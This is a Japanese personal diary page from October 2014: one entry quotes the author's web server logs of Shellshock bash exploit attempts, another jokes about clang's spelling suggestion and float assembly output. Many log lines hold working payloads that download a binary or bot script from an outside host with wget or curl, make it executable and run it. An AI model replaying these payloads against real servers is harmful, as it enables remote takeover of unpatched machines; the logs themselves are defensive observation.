2014-10 日記コピー

2014-10-01 早速手当たりしだいっすか

[www] うちにも来てたbashのあれ

ちょっと遅いじゃんとか思ってしまった。

70.42.149.72 - - [27/Sep/2014:11:56:26 +0900] "GET /cgi-bin/test.sh HTTP/1.0" 404 213 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
70.42.149.72 - - [27/Sep/2014:11:56:26 +0900] "GET /test HTTP/1.0" 404 846 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
70.42.149.72 - - [27/Sep/2014:11:56:26 +0900] "GET / HTTP/1.0" 301 230 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
70.42.149.72 - - [27/Sep/2014:11:56:27 +0900] "GET /wiki/ HTTP/1.0" 302 - "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
70.42.149.72 - - [27/Sep/2014:11:56:28 +0900] "GET /wiki//doku.php HTTP/1.0" 200 14816 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
118.192.48.6 - - [27/Sep/2014:22:00:30 +0900] "GET /cgi-bin/count.cgi HTTP/1.1" 404 215 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo bmndjBo5Sq`;"
118.192.48.6 - - [27/Sep/2014:22:00:30 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 214 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo ugDkByM7dO`;"
118.192.48.6 - - [27/Sep/2014:22:00:30 +0900] "GET /cgi-bin/help.cgi HTTP/1.1" 404 214 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo nkqiGljruE`;"
118.192.48.6 - - [27/Sep/2014:22:00:31 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 404 215 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo 5rWdaiTMSA`;"
82.221.105.197 - - [29/Sep/2014:07:30:11 +0900] "GET / HTTP/1.1" 301 230 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
54.251.83.67 - - [29/Sep/2014:20:47:31 +0900] "GET / HTTP/1.1" 301 230 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
188.165.227.201 - - [29/Sep/2014:23:08:34 +0900] "GET / HTTP/1.0" 301 230 "() { :; }; ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
188.165.227.201 - - [30/Sep/2014:00:58:32 +0900] "GET / HTTP/1.0" 301 230 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
188.165.227.201 - - [30/Sep/2014:03:47:32 +0900] "GET / HTTP/1.0" 301 230 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
188.165.227.201 - - [30/Sep/2014:06:01:34 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 846 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
188.165.227.201 - - [30/Sep/2014:07:35:17 +0900] "GET /cgi-bin/redirect.cgi HTTP/1.0" 404 218 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
46.161.41.142 - - [30/Sep/2014:20:49:33 +0900] "GET / HTTP/1.0" 301 230 "() { :; }; ping -c 46.161.41.142" "() { :; }; ping -c 46.161.41.142"

これは別サイト。調査の人もなんかやっとるね。

209.126.230.72 - - [25/Sep/2014:16:27:31 +0900] "GET / HTTP/1.0" 200 231 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
162.253.66.76 - - [25/Sep/2014:22:04:23 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 400 226 "() { :; }; curl -o /tmp/besh http://162.253.66.76/apache; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
195.154.222.128 - - [25/Sep/2014:23:59:29 +0900] "GET / HTTP/1.0" 200 231 "() { :; }; ping -c 3 195.154.222.128" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
118.192.48.6 - - [27/Sep/2014:23:57:10 +0900] "GET /cgi-bin/count.cgi HTTP/1.1" 404 215 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo m6PG5LYCiq`;"
118.192.48.6 - - [27/Sep/2014:23:57:10 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 214 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo 3FgCxi0BIj`;"
118.192.48.6 - - [27/Sep/2014:23:57:10 +0900] "GET /cgi-bin/help.cgi HTTP/1.1" 404 214 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo enKf9bHQ3c`;"
118.192.48.6 - - [27/Sep/2014:23:57:10 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 404 215 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo Fnwq3ZoaWy`;"
174.128.48.101 - - [28/Sep/2014:21:16:19 +0900] "GET / HTTP/1.0" 200 231 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
78.46.38.146 - - [29/Sep/2014:03:44:17 +0900] "GET /wiki/wiki.cgi?action=ATTACH&page=%A5%CB%A5%B3%A5%CB%A5%B3%C0%B8%CA%FC%C1%F7%A4%CB%A5%B2%A1%BC%A5%E0%B2%E8%CC%CC%A4%F2%BF%E2%A4%EC%CE%AE%A4%B9%BC%EA%C8%B4%A4%AD%A4%CE%CA%FD%CB%A1&file=soft2.jpg HTTP/1.1" 200 123894 "http://xxxxx.xxx.xx/wiki/wiki.cgi?action=ATTACH&page=%A5%CB%A5%B3%A5%CB%A5%B3%C0%B8%CA%FC%C1%F7%A4%CB%A5%B2%A1%BC%A5%E0%B2%E8%CC%CC%A4%F2%BF%E2%A4%EC%CE%AE%A4%B9%BC%EA%C8%B4%A4%AD%A4%CE%CA%FD%CB%A1&file=soft2.jpg" "() { :;}; /bin/bash -c \"wget http://78.46.38.146/wwws -O /tmp\""
78.46.38.146 - - [29/Sep/2014:03:47:59 +0900] "GET /wiki/wiki.cgi?action=ATTACH&page=%A5%CB%A5%B3%A5%CB%A5%B3%C0%B8%CA%FC%C1%F7%A4%CB%A5%B2%A1%BC%A5%E0%B2%E8%CC%CC%A4%F2%BF%E2%A4%EC%CE%AE%A4%B9%BC%EA%C8%B4%A4%AD%A4%CE%CA%FD%CB%A1&file=soft2.jpg HTTP/1.1" 200 40885 "http://xxxxx.xxx.xx/wiki/wiki.cgi?action=ATTACH&page=%A5%CB%A5%B3%A5%CB%A5%B3%C0%B8%CA%FC%C1%F7%A4%CB%A5%B2%A1%BC%A5%E0%B2%E8%CC%CC%A4%F2%BF%E2%A4%EC%CE%AE%A4%B9%BC%EA%C8%B4%A4%AD%A4%CE%CA%FD%CB%A1&file=soft2.jpg" "() { :;}; /bin/bash -c \"wget http://78.46.38.146/wwws -O /tmp/.ah\""
173.45.100.18 - - [29/Sep/2014:09:32:59 +0900] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
188.165.227.201 - - [29/Sep/2014:22:41:42 +0900] "GET / HTTP/1.0" 200 231 "() { :; }; ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
54.251.83.67 - - [30/Sep/2014:00:54:22 +0900] "GET / HTTP/1.1" 200 231 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
188.165.227.201 - - [30/Sep/2014:01:44:36 +0900] "GET / HTTP/1.0" 200 231 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
188.165.227.201 - - [30/Sep/2014:03:51:34 +0900] "GET / HTTP/1.0" 200 231 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
188.165.227.201 - - [30/Sep/2014:06:00:24 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
142.4.215.115 - - [30/Sep/2014:18:15:12 +0900] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
46.161.41.142 - - [30/Sep/2014:21:09:40 +0900] "GET / HTTP/1.0" 200 231 "() { :; }; ping -c 46.161.41.142" "() { :; }; ping -c 46.161.41.142"

54.251.83.67からのアクセスが、なんか手広くやってそうな感じ。wgetやcurlなんて入れてないサイトもあるから。 46.161.41.142の君、たぶんそれ失敗する。

2014-10-23 気が利きすぎじゃないかｗ

[FreeBSD] FreeBSDのclang

キーワード間違えたコード書いちゃったんだけど、一人くすっと来た(^^

$ cat a.c
#include <stdio.h>
int main()
{
        flocat a = 0.07;
        a = a * 1;
        printf("%f\n",a);
}
$ cc a.c
a.c:4:2: error: use of undeclared identifier 'flocat'; did you mean 'float'?
        flocat a = 0.07;
        ^~~~~~
        float
1 error generated.
$ cc -v
FreeBSD clang version 3.3 (tags/RELEASE_33/final 183502) 20130610
Target: x86_64-unknown-freebsd10.0
Thread model: posix
$

そんな｢もしかして｣機能までがんばらんでいいのにｗ仰るとおりに float に書き直してコンパイル＆実行。

$ cc a.c
$ ./a.out
0.070000
$

ろ、ロング？

$ cc -S a.c
$ cat a.s
        .file   "a.c"
        .section        .rodata.cst4,"aM",@progbits,4
        .align  4
.LCPI0_0:
        .long   1032805417              # float 0.07  ←！？
        .text
        .globl  main
        .align  16, 0x90
        .type   main,@function
main:                                   # @main
        .cfi_startproc
# BB#0:
        pushq   %rbp
.Ltmp2:
        .cfi_def_cfa_offset 16
.Ltmp3:
        .cfi_offset %rbp, -16
        movq    %rsp, %rbp
.Ltmp4:
        .cfi_def_cfa_register %rbp
        subq    $16, %rsp
        leaq    .L.str, %rdi
        movabsq $1, %rax
        cvtsi2ssq       %rax, %xmm0
        movss   .LCPI0_0, %xmm1
        movss   %xmm1, -4(%rbp)
        movss   -4(%rbp), %xmm1
        mulss   %xmm0, %xmm1
        movss   %xmm1, -4(%rbp)
        cvtss2sd        -4(%rbp), %xmm0
        movb    $1, %al
        callq   printf
        movl    $0, %ecx
        movl    %eax, -8(%rbp)          # 4-byte Spill
        movl    %ecx, %eax
        addq    $16, %rsp
        popq    %rbp
        ret
.Ltmp5:
        .size   main, .Ltmp5-main
        .cfi_endproc
　
        .type   .L.str,@object          # @.str
        .section        .rodata.str1.1,"aMS",@progbits,1
.L.str:
        .asciz   "%f\n"
        .size   .L.str, 4
　
        .section        ".note.GNU-stack","",@progbits
$

1,032,805,417 は素直に単精度浮動小数点表現の整数値読みでいいのかな？

努力したWiki

目次